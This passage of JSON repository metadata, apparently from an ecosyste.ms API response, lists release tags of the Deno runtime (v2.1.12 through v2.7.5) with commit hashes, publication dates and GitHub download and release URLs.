.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z